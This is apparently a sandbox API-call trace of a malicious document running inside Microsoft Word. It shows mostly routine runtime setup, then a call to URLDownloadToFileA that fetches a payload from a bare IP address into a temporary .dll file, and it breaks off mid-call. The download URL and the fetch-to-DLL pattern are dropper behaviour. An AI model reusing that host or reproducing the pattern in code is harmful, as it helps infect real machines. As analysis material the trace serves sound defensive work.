MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196c78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0124.535] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0124.535] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x196a68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0124.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x197328, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿb\x90Y»dv\x19", lpUsedDefaultChar=0x0) returned 256 [0124.535] RtlInitializeSListHead (in: ListHead=0x11f7a0e8 | out: ListHead=0x11f7a0e8) [0124.535] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0124.536] GetProcAddress (hModule=0x76720000, lpProcName="FlsAlloc") returned 0x7673a980 [0124.536] GetProcAddress (hModule=0x76720000, lpProcName="FlsFree") returned 0x76744ff0 [0124.537] GetProcAddress (hModule=0x76720000, lpProcName="FlsGetValue") returned 0x76737570 [0124.538] GetProcAddress (hModule=0x76720000, lpProcName="FlsSetValue") returned 0x76739e30 [0124.538] GetProcAddress (hModule=0x76720000, lpProcName="InitializeCriticalSectionEx") returned 0x76746740 [0124.539] GetProcAddress (hModule=0x76720000, lpProcName="InitOnceExecuteOnce") returned 0x769cc2d0 [0124.539] GetProcAddress (hModule=0x76720000, lpProcName="CreateEventExW") returned 0x767466a0 [0124.540] GetProcAddress (hModule=0x76720000, lpProcName="CreateSemaphoreW") returned 0x76746710 [0124.540] GetProcAddress (hModule=0x76720000, lpProcName="CreateSemaphoreExW") returned 0x76746700 [0124.541] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolTimer") returned 0x7673ace0 [0124.541] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolTimer") returned 0x77217dc0 [0124.542] GetProcAddress (hModule=0x76720000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77224010 [0124.542] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolTimer") returned 0x77222a50 [0124.543] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolWait") returned 0x7673a7b0 [0124.543] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolWait") returned 0x77222290 [0124.544] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolWait") returned 0x77222910 [0124.545] GetProcAddress (hModule=0x76720000, lpProcName="FlushProcessWriteBuffers") returned 0x77247a60 [0124.545] GetProcAddress (hModule=0x76720000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7723ac00 [0124.545] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentProcessorNumber") returned 0x7722a890 [0124.546] GetProcAddress (hModule=0x76720000, lpProcName="CreateSymbolicLinkW") returned 0x76760830 [0124.546] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentPackageId") returned 0x769cded0 [0124.547] GetProcAddress (hModule=0x76720000, lpProcName="GetTickCount64") returned 0x76733630 [0124.547] GetProcAddress (hModule=0x76720000, lpProcName="GetFileInformationByHandleEx") returned 0x76760ea0 [0124.548] GetProcAddress (hModule=0x76720000, lpProcName="SetFileInformationByHandle") returned 0x76746c30 [0124.548] GetProcAddress (hModule=0x76720000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x76746cf0 [0124.549] GetProcAddress (hModule=0x76720000, lpProcName="InitializeConditionVariable") returned 0x771f6710 [0124.549] GetProcAddress (hModule=0x76720000, lpProcName="WakeConditionVariable") returned 0x7723c720 [0124.550] GetProcAddress (hModule=0x76720000, lpProcName="WakeAllConditionVariable") returned 0x77238d70 [0124.550] GetProcAddress (hModule=0x76720000, lpProcName="SleepConditionVariableCS") returned 0x76a47f60 [0124.551] GetProcAddress (hModule=0x76720000, lpProcName="InitializeSRWLock") returned 0x771f6710 [0124.551] GetProcAddress (hModule=0x76720000, lpProcName="AcquireSRWLockExclusive") returned 0x7721d210 [0124.552] GetProcAddress (hModule=0x76720000, lpProcName="TryAcquireSRWLockExclusive") returned 0x771f3650 [0124.552] GetProcAddress (hModule=0x76720000, lpProcName="ReleaseSRWLockExclusive") returned 0x7721d080 [0124.620] GetProcAddress (hModule=0x76720000, lpProcName="SleepConditionVariableSRW") returned 0x76a47fb0 [0124.621] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolWork") returned 0x7673ea00 [0124.621] GetProcAddress (hModule=0x76720000, lpProcName="SubmitThreadpoolWork") returned 0x7721ce10 [0124.622] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolWork") returned 0x77220550 [0124.622] GetProcAddress (hModule=0x76720000, lpProcName="CompareStringEx") returned 0x7673ff80 [0124.622] GetProcAddress (hModule=0x76720000, lpProcName="GetLocaleInfoEx") returned 0x7673a750 [0124.623] GetProcAddress (hModule=0x76720000, lpProcName="LCMapStringEx") returned 0x76739a10 [0124.623] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x800) returned 0xb2886b8 [0124.623] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0124.623] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x11f7a8f0, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\winword.exe")) returned 0x3c [0124.623] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4c) returned 0xcb307b8 [0124.623] GetEnvironmentStringsW () returned 0xf51cc60* [0124.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1511, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1511 [0124.623] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x5e7) returned 0xf51d838 [0124.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1511, lpMultiByteStr=0xf51d838, cbMultiByte=1511, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1511 [0124.624] FreeEnvironmentStringsW (penv=0xf51cc60) returned 1 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa0) returned 0xf51c620 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1f) returned 0xcb705c0 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2e) returned 0xf36e7b0 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x37) returned 0xcb38950 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x3c) returned 0xcb81220 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x31) returned 0xcb38990 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x14) returned 0xc927f10 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x24) returned 0xc87ae18 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x31) returned 0xcb39050 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x28) returned 0xc87a938 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xd) returned 0xcb2cf78 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1d) returned 0xcb70200 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x31) returned 0xcb39350 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x15) returned 0xc927d10 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x17) returned 0xc927e70 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xe) returned 0xcb2cf60 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x69) returned 0xc99d718 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x3e) returned 0xcb814f0 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1b) returned 0xcb70110 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1d) returned 0xcb70138 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x48) returned 0xcb1ec98 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x12) returned 0xc927e30 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x18) returned 0xc928070 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1b) returned 0xcb701b0 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x24) returned 0xc87a968 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x29) returned 0xf36e858 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1e) returned 0xcb70390 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x6b) returned 0xcbeb170 [0124.624] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x17) returned 0xc927df0 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x14) returned 0xc927ed0 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xf) returned 0xcb2ced0 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x16) returned 0xc927d50 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2a) returned 0xf36eaf8 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x29) returned 0xf36ed28 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x12) returned 0xc927fb0 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x21) returned 0xc87a998 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x16) returned 0xc927ef0 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x22) returned 0xc87ab48 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x12) returned 0xc927f70 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x65) returned 0xcb5c6c0 [0124.625] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xf51d838 | out: hHeap=0x5c0000) returned 1 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x80) returned 0xcbe2b70 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x8) returned 0xcb81ec8 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0xcb70458 [0124.625] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x2) returned 0xcb81ed8 [0124.626] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81ed8 | out: hHeap=0x5c0000) returned 1 [0124.626] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x2) returned 0xcb81fc8 [0124.626] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x8) returned 0xcb81ed8 [0124.626] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x18) returned 0xc927cd0 [0124.626] GetLastError () returned 0x0 [0124.626] SetLastError (dwErrCode=0x0) [0124.626] GetLastError () returned 0x0 [0124.626] SetLastError (dwErrCode=0x0) [0124.626] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xb8) returned 0xb2a0fd8 [0124.626] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x6a6) returned 0xf51cc60 [0124.626] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xf51cc60 | out: hHeap=0x5c0000) returned 1 [0124.626] GetLastError () returned 0x0 [0124.626] SetLastError (dwErrCode=0x0) [0124.626] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x6) returned 0xcb81f78 [0124.626] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x2) returned 0xcb81ea8 [0124.627] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4) returned 0xcb81fd8 [0124.627] GetLastError () returned 0x0 [0124.627] SetLastError (dwErrCode=0x0) [0124.627] GetLastError () returned 0x0 [0124.627] SetLastError (dwErrCode=0x0) [0124.627] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xb8) returned 0xb2a1398 [0124.627] GetLastError () returned 0x0 [0124.627] SetLastError (dwErrCode=0x0) [0124.627] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x6a6) returned 0xf51cc60 [0124.627] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xf51cc60 | out: hHeap=0x5c0000) returned 1 [0124.627] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81f78 | out: hHeap=0x5c0000) returned 1 [0124.627] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xb2a0fd8 | out: hHeap=0x5c0000) returned 1 [0124.627] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81fd8 | out: hHeap=0x5c0000) returned 1 [0124.627] GetLastError () returned 0x0 [0124.627] SetLastError (dwErrCode=0x0) [0124.627] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x6) returned 0xcb81f58 [0124.627] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x2) returned 0xcb81f18 [0124.627] GetLastError () returned 0x0 [0124.627] SetLastError (dwErrCode=0x0) [0124.627] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x200) returned 0xc8ce190 [0124.627] GetLastError () returned 0x0 [0124.627] SetLastError (dwErrCode=0x0) [0124.628] GetLastError () returned 0x0 [0124.628] SetLastError (dwErrCode=0x0) [0124.628] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4) returned 0xcb81fb8 [0124.628] GetLastError () returned 0x0 [0124.628] SetLastError (dwErrCode=0x0) [0124.628] GetLastError () returned 0x0 [0124.628] SetLastError (dwErrCode=0x0) [0124.628] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xb8) returned 0xb2a0fd8 [0124.628] GetLastError () returned 0x0 [0124.628] SetLastError (dwErrCode=0x0) [0124.628] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x6a6) returned 0xf51cc60 [0124.628] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xf51cc60 | out: hHeap=0x5c0000) returned 1 [0124.628] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81f58 | out: hHeap=0x5c0000) returned 1 [0124.628] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xb2a1398 | out: hHeap=0x5c0000) returned 1 [0124.628] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81fb8 | out: hHeap=0x5c0000) returned 1 [0124.628] GetLastError () returned 0x0 [0124.628] SetLastError (dwErrCode=0x0) [0124.628] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x6) returned 0xcb81fd8 [0124.628] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81f18 | out: hHeap=0x5c0000) returned 1 [0124.628] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81ea8 | out: hHeap=0x5c0000) returned 1 [0124.628] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x8) returned 0xcb82028 [0124.629] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x50) returned 0xcb30028 [0124.629] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x40) returned 0xcb81a48 [0124.629] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x40) returned 0xcb812b0 [0124.629] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x40) returned 0xcb81460 [0124.629] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x40) returned 0xcb816a0 [0124.629] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb816a0 | out: hHeap=0x5c0000) returned 1 [0124.629] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf576c78 [0124.629] GetLocalTime (in: lpSystemTime=0x197574 | out: lpSystemTime=0x197574*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x22, wSecond=0x10, wMilliseconds=0x22a)) [0124.629] wsprintfA (in: param_1=0xf576c78, param_2="%02u:%02u:%02u " | out: param_1="19:34:18 ") returned 9 [0124.629] wsprintfA (in: param_1=0xf576c81, param_2="Starting download\n" | out: param_1="Starting download\n") returned 18 [0124.630] OutputDebugStringA (lpOutputString="19:34:18 Starting download\n") [0124.630] LocalFree (hMem=0xf576c78) returned 0x0 [0124.630] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x1033) returned 0xf51cc60 [0124.632] GetTempPathA (in: nBufferLength=0x1000, lpBuffer=0xf51cc80 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0124.633] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="y", uUnique=0x0, lpTempFileName=0xf51cc80 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yDB10.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ydb10.tmp")) returned 0xdb10 [0124.637] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yDB10.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ydb10.tmp")) returned 1 [0124.637] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf57ac98 [0124.637] GetLocalTime (in: lpSystemTime=0x1975d8 | out: lpSystemTime=0x1975d8*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x22, wSecond=0x10, wMilliseconds=0x23a)) [0124.637] wsprintfA (in: param_1=0xf57ac98, param_2="%02u:%02u:%02u " | out: param_1="19:34:18 ") returned 9 [0124.638] wsprintfA (in: param_1=0xf57aca1, param_2="Starting download from %s to %s\n" | out: param_1="Starting download from http://45.8.146.139/fhfty/BGYGN01M2AWVEJJYWONII6ZCFIQSR1QN/-f to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yDB10.tmp.dll\n") returned 139 [0124.638] OutputDebugStringA (lpOutputString="19:34:18 Starting download from http://45.8.146.139/fhfty/BGYGN01M2AWVEJJYWONII6ZCFIQSR1QN/-f to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yDB10.tmp.dll\n") [0124.638] LocalFree (hMem=0xf57ac98) returned 0x0 [0124.638] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x717a0000 [0124.655] URLDownloadToFileA (param_1=0x0, param_2="http://45.8.146.139/fhfty/BGYGN01M2AWVEJJYWONII6ZCFIQSR1QN/-f", param_3="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yDB10.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ydb10.tmp.dll"), param_4=0x0, param_5=0x0) returned 0x800c0005 [0148.542] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf578c88 [0148.542] GetLocalTime (in: lpSystemTime=0x1975c8 | out: lpSystemTime=0x1975c8*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x22, wSecond=0x28, wMilliseconds=0x1dd)) [0148.542] wsprintfA (in: param_1=0xf578c88, param_2="%02u:%02u:%02u " | out: param_1="19:34:42 ") returned 9 [0148.542] GetLastError () returned 0x0 [0148.543] FormatMessageA (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x19700c, nSize=0x0, Arguments=0x0 | out: lpBuffer="ø©\x87\x0c") returned 0x27 [0148.544] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x30) returned 0xf36ffc0 [0148.545] LocalFree (hMem=0xc87a9f8) returned 0x0 [0148.545] GetLastError () returned 0x0 [0148.545] wsprintfA (in: param_1=0xf578c91, param_2="Finished download from %s to %s: %d %s\n" | out: param_1="Finished download from http://45.8.146.139/fhfty/BGYGN01M2AWVEJJYWONII6ZCFIQSR1QN/-f to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yDB10.tmp.dll: 0 Error#0:The operation completed successfully.\r\n\n") returned 190 [0148.545] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xf36ffc0 | out: hHeap=0x5c0000) returned 1 [0148.545] OutputDebugStringA (lpOutputString="19:34:42 Finished download from http://45.8.146.139/fhfty/BGYGN01M2AWVEJJYWONII6ZCFIQSR1QN/-f to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yDB10.tmp.dll: 0 Error#0:The operation completed successfully.\r\n\n") [0148.547] LocalFree (hMem=0xf578c88) returned 0x0 [0148.547] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x40) returned 0xcb7eb08 [0148.547] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x38) returned 0xc876c58 [0148.548] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x76720000 [0148.549] GetProcAddress (hModule=0x76720000, lpProcName="AreFileApisANSI") returned 0x7673f300 [0148.549] AreFileApisANSI 